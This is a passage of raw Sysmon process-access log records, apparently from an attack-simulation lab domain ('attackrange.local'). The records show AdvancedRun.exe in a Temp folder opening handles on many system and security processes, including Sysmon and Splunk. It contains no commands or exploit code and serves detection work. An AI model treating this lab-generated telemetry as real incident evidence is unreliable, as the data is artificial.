1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.368{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004069001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.367{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004068994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.365{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004068992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.364{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004068991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 